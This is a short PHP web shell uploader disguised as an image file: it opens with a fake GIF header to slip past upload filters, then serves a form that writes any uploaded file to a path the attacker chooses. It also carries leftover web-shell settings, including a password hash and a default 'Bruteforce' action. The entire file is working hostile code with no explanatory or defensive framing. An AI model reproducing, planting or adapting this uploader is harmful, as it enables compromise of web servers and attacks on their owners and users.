gif89;a gif;ghz jpg;a
<?php

$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
		$auth_pass = "f448c10cdca56b87dbf157d53f627500";
$color = "#ddff55";
$default_use_ajax = true;
$default_charset = 'Windows-1251';
$default_action='Bruteforce';
    }
}echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>';
?>